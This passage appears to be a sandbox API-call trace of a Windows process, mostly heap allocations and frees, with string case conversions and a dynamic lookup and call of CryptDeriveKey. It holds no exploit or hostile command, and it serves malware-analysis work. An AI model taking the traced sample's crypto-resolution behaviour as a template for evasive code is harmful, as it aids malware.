0x24b2658 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0267.976] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.976] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0267.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0267.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.977] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.977] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.978] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.978] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.978] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0267.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0267.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0267.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.980] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0267.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.981] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.981] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.982] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.982] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0267.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0267.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0267.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0267.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24a9c18 [0267.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9c18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0267.988] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.989] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 